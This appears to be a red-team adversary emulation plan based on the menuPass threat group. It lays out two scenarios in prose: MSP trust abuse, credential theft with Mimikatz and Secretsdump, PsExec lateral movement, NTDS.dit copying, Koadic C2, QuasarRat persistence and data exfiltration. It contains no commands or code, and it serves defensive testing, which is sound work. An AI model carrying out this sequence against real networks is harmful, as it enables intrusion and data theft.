Please see the formal menuPass Intelligence Summary which includes a break-down of the cited intelligence used for each step of this emulation. The menuPass emulation is split into two distinct Scenarios, Scenario 1 and Scenario 2.
Due to the wealth of publicly available information in this regard, reconnaissance and resource development considerations have been summarized. While not necessary, if you have the resources to emulate this activity and intend to do so while remaining operationally representative, the information provided may be beneficial. Information gathering, capability development, weaponization, and infrastructure are discussed at a high level to give context to the emulation and serve as a reference for the emulation team.
Scenario 1 prescribes TTPs similar to those attributed to menuPass specific to the group's efforts targeting MSP subscriber networks.
menuPass is reported to have compromised MSP networks with the intent of abusing trust relationships to pivot into subscriber networks.4 5 6 7 10 12 The attackers traversed MSP networks in search of shared infrastructure. This infrastructure was compromised and used as a pivot point into the subscriber network. menuPass is commonly reported to have accessed subscriber networks with legitimate but compromised MSP or subscriber domain credentials.4 5 6 7 10 12
To emulate initial access, you may elect to assess the feasibility of trusted relationship abuse by enumerating shared infrastructure and services that could serve as a foothold into your networks.
You may also assume breach by providing the emulation team with a VPN/RDP connection. menuPass is reported to have initially accessed MSP subscriber networks with elevated permissions, so too should the emulation team.4 5 6 7 10 12 The intent of this scenario is to assess your organization's ability to protect, detect, and defend against execution, tool ingress, discovery, credential access, lateral movement, persistence, collection, and exfiltration and thereby encourage defense in depth. The YAML file does not address initial access. This procedure is left to the discretion of the emulation team.
After establishing a point of presence on the target network, menuPass actors are commonly reported to have introduced an operational toolkit from attacker controlled infrastructure. This operational toolkit enables the attackers to pursue operational objectives and will enable the emulation team to pursue the subsequent steps in this scenario.
Once the operational toolkit has been introduced to the operating environment, the emulation team will conduct discovery with the intent of identifying opportunities while attempting to blend in with routine administrative tasks. The emulation team should enumerate the network and Active Directory (AD) with the intent of identifying opportunities for credential access and lateral movement. This is also the time to begin searching for systems of interest and identifying approaches to these systems.
This objective should be pursued in parallel with discovery.4 Reporting suggests that the credentials used by menuPass to pivot into target networks provided elevated permissions. Other reporting details menuPass's use of exploits to achieve initial access. Some of these exploits may have resulted in code execution in an elevated context. In either case, the need for privilege escalation has been satisfied and the actors may instead, be interested in pursuing credential access in order to ensure freedom of movement throughout the domain.4 menuPass actors are thought to have compromised additional credentials using publicly available tools like Mimikatz and Secretsdump.4
After performing discovery and compromising additional credentials, the emulation team should attempt lateral movement to systems of interest using tools indicative of routine administrative tasks.
menuPass is reported to have accessed remote systems by mounting remote network shares, using RDP to console into remote machines, and by using tools like PsExec to achieve remote code execution. menuPass actors are reported to have used these techniques to deploy their sustained malware to remote systems and subsequently establish C2.4 After C2 was established with the system of interest, menuPass actors are reported to have confirmed network connectivity and conducted situational awareness checks.
After successfully establishing a point of presence on the remote system of interest, menuPass actors are then reported to have browsed the file system in search of information. This information was subsequently compressed and staged for exfiltration, often in the Recycle Bin.4
The compressed archives are then reported to have been exfiltrated from the victim network by mounting a remote network share and copying the files out of the network or by using tools like Putty and/or Robocopy to transfer the data.4
Scenario 2 prescribes TTPs publicly attributed to menuPass that entail the pursuit of operational objectives using a command-and-control framework. This scenario is intended to assess your organization's ability to protect, detect, and defend to execution, discovery, privilege escalation, credential access, lateral movement, exfiltration, command and control, and persistence using a C2 framework. Amongst other tactical implants, menuPass is reported to have used Koadic C3. This publicly available C2 framework relies on Windows Scripting Host to conduct most of its operations. This tool will be used to pursue tactical objectives with the operational objective of exfiltrating/simulating exfiltration.
menuPass is reported to have deployed tactical implants by spearphishing. Spearphishing emails attributed to menuPass typically featured a weaponized attachment that when opened, would exploit a vulnerability, direct the recipient to run an embedded macro, or click a link to download and execute a file. Each of these vectors were responsible for deploying menuPass malware and establishing command and control.4
If you have the resources to dedicate to emulating a phishing campaign, please do so. We have suggested an execution event that situates a tactical implant (Koadic C3) in memory and establishes C2. This implant will be used to accomplish the subsequent steps in this scenario.
After establishing C2, menuPass actors are reported to have conducted situational awareness checks by accessing the Windows command-line. You may also elect to conduct discovery with the intent of identifying systems of interest, staging points, and viable points of persistence.
In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account. This white-carded event could enable the assessing team to escalate via credential access, as most of the credential access procedures described hereafter require elevated privileges. You may also elect to use Koadic's "elevate" modules to achieve execution in an elevated context.
Much like Scenario 1, we will seek to access additional credentials to ensure freedom of movement. This step differs from credential access in Scenario 1 as we will be using our tactical implant to achieve credential access.
In some instances, menuPass actors are reported to have copied and exfiltrated the Active Directory database file (NTDS.dit). This level of credential access ensures freedom of movement throughout the domain.
The credentials used in the previous step will be coupled with modules native to Koadic to move laterally to systems of interest and conduct exfiltration/simulate exfiltration.
menuPass is reported to have deployed sustained malware to strategic systems within the compromised environment to ensure long-term persistent access to the network.4 5 6 7 10 12 In this step, we use Koadic and/or the Windows command-line to ingress sustained malware. menuPass is widely reported to have used the publicly available QuasarRat.